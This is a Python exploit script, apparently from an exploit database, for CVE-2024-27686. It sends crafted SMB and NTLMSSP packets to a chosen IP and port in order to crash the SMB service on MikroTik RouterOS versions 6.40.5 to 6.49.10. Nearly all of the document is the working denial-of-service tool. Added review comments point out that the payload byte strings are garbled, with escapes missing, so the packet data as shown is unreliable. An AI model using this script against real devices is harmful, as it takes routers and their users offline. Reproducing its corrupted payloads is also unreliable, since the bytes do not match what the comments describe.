# Exploit Title: CVE-2024-27686: RouterOS-SMB-DOS
# Google Dork: N/A
# Date: 03/04/2024
# Exploit Author: ice-wzl, Solstice Cyber Solutions
# Vendor Homepage: https://mikrotik.com/
# Software Link: https://mikrotik.com/download/archive
# Version: RouterOS devices ranging from 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# Tested on: RouterOS 6.40.5 - 6.44 and 6.48.1 - 6.49.10
# CVE : CVE-2024-27686
#!/usr/bin/python3
# Founded by ice-wzl in conjunction with Solstice Cyber Solutions
import argparse
import sys
import socket
# Define the packets

# the packet that causes crash 6.40.5 - 6.42.3
# Frame sent by send_payload_low().
# NOTE(review): this literal (and the two below) mixes `\x00` escapes with
# bare `x00` text, so as written much of it is ASCII rather than the raw
# bytes the comments describe; presumably escapes were lost in transcription
# of the page — verify against the original file before drawing conclusions.
fuzzed_packet_6 = b'x00x00x00nxfeSMB@x00x00x00x00x00x00x00x03x00xf1x1fx08x00x00x00x00x00x00xe1xbex82x00x03x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x06x00x00x00x00x00x00x00Gxe5x07xf5x07xecx01uxe4Q]x9exeaxednxa9 x00x00x00Hx00&x00\x00\x001x009x002x00.x001x006x008x00.x001x005x00.x007x007x00\x00px00ux00bx00'


# Frames sent, in this order, by send_payload_high().
packet_0 = b'x00x00x00xeaxfeSMB@x00x00x00x00x00x00x00x00x00x1fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00$x00x05x00x01x00x00x00x7fx00x00x00xe8xe4*x99xc9xebxb6Exa2Axe9(xee%xe5xdfpx00x00x00x04x00x00x00x02x02x10x02x00x03x02x03x11x03x00x00x01x00&x00x00x00x00x00x01x00 x00x01x00_xf7mxf2h*x8fx8aex0f8+T=Na8_x0b@Cx82xe7x87xc3qZxd7xcf0Mx87x00x00x02x00 x00x00x00x00x00x04x00x02x00x01x00x04x00x03x00x00x00x00x00x00x00x08x00x08x00x00x00x00x00x03x00x02x00x01x00x00x00x05x00x1ax00x00x00x00x001x009x002x00.x001x006x008x00.x001x005x00.x008x004x00'
packet_2_fuzzed = b'x00x00x00xa2xfeSMB@x00x00x00x00x00x00x00x01x00x00 x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00x00x00x00x00x00x00x00x00x00x00x19x00x00x01x01x00x00x00x00x00x00x00Xx00Jx00x00x00x00x00x00x00x00x00`Hx05x06+x06x01x05x05x02xa0>0<xa0x0e21540373xedxbaxad211x0cx06 +x06x01x04x01x82294517887446830x02x02 xa2*x04(NTLMSSPx00x01x00x00x00x15x82x08bx00x00x00x00(x00x00x00x00x00x00x00(x00x00x00x06x01x00x00x00x00x00x0f'


def open_connection(ip, port):
    """Open a TCP connection to ``ip``:``port`` and return the connected socket.

    If the connection is refused, a message is printed and the process exits
    with status 2.  Any other socket error propagates to the caller.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((ip, port))
    except ConnectionRefusedError:
        print(f"[!] Connection Refused on: {ip} {port}")
        sys.exit(2)
    return sock

def send_payload_high(s):
    """Write ``packet_0`` then ``packet_2_fuzzed`` to ``s`` and close it.

    Each frame is passed to ``socket.send`` once; partial sends are not
    retried, matching the original behaviour.
    """
    for frame in (packet_0, packet_2_fuzzed):
        s.send(frame)
    s.close()

def send_payload_low(s):
    """Write ``fuzzed_packet_6`` to ``s`` with a single ``send`` and close it."""
    frame = fuzzed_packet_6
    s.send(frame)
    s.close()

def verify_input(user_inp):
    """Validate the version menu choice typed by the user.

    Returns the choice as an ``int`` when it parses as 1 or 2, ``3`` when it
    is an integer outside that range, and ``0`` when ``int()`` rejects it.
    """
    try:
        choice = int(user_inp)
    except ValueError:
        return 0
    # 3 doubles as the "out of range" sentinel checked by the caller.
    return choice if 1 <= choice <= 2 else 3

if __name__ == '__main__':

    parser = argparse.ArgumentParser(prog='SMB Crash',
                                     description='Crashes Mikrotik RouterOS SMB Service 6.40.5 - 6.49.10',
                                     epilog='Discovered by: ice-wzl')

    # Both options are stored as plain strings; the port is converted with
    # int() below, so a non-numeric --port raises ValueError at that point.
    parser.add_argument("-t", "--target", action="store", dest="target")
    parser.add_argument("-p", "--port", action="store", dest="port")

    args = parser.parse_args()

    # Both options are mandatory: exit with status 1 and point at --help.
    if not args.target or not args.port:
        print(f"[+] python3 {sys.argv[0]} --help")
        sys.exit(1)

    # The version is read interactively rather than from an option.
    print("[+] What version is the target: [1] 6.40.5 - 6.44 [2] 6.48.1 - 6.49.10 Enter 1 or 2:")
    version_choice = input("--> ")

    # verify_input() is a pure function of the typed string, so calling it
    # again on each comparison below yields the same value every time.
    if verify_input(version_choice) == 0:
        print("Please enter a number...")
        sys.exit(3)
    elif verify_input(version_choice) == 3:
        print("Please enter a number between 1 and 2")
        sys.exit(4)

    if verify_input(version_choice) == 1:
        if args.port:
            get_connect = open_connection(args.target, int(args.port))
            send_payload_low(get_connect)
            print(f"[+] Sent DOS to {args.target} on {args.port}")
        else:
            # Unreachable: a missing --port already exited with status 1
            # above, so this default of 445 is never applied.
            get_connect = open_connection(args.target, 445)
            send_payload_low(get_connect)
            print(f"[+] Sent DOS to {args.target} on 445")

    if verify_input(version_choice) == 2:
        if args.port:
            get_connect = open_connection(args.target, int(args.port))
            send_payload_high(get_connect)
            print(f"[+] Sent DOS to {args.target} on {args.port}")

        else:
            # Unreachable for the same reason as the branch above.
            get_connect = open_connection(args.target, 445)
            send_payload_high(get_connect)
            print(f"[+] Sent DOS to {args.target} on 445")